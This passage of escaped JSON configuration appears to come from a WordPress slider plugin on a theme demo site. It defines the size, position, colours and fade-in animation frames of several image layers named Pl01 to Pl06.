1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"24\":{\"text\":\"Image 7\",\"alias\":\"Pl01\",\"uid\":24,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl01-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"height\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-138px\",\"e\":true},\"n\":{\"v\":\"-138px\"},\"t\":{\"v\":\"-138px\"},\"m\":{\"v\":\"-138px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":16,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"25\":{\"text\":\"Image 7\",\"alias\":\"Pl03\",\"uid\":25,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl02.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"height\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-46px\",\"e\":true},\"n\":{\"v\":\"-46px\"},\"t\":{\"v\":\"-46px\"},\"m\":{\"v\":\"-46px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":17,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"26\":{\"text\":\"Image 7\",\"alias\":\"Pl04\",\"uid\":26,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl03-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"height\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"46px\",\"e\":true},\"n\":{\"v\":\"46px\"},\"t\":{\"v\":\"46px\"},\"m\":{\"v\":\"46px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":18,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":18,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"28\":{\"text\":\"Image 7\",\"alias\":\"Pl05\",\"uid\":28,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl04-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"height\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"138px\",\"e\":true},\"n\":{\"v\":\"138px\"},\"t\":{\"v\":\"138px\"},\"m\":{\"v\":\"138px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":19,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":19,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"30\":{\"text\":\"Image 7\",\"alias\":\"Pl06\",\"uid\":30,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl05-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"height\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"230px\",\"e\":true},\"n\":{\"v\":\"230px\"},\"t\":{\"v\":\"230px\"},\"m\":{\"v\":\"230px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":20,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":20,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 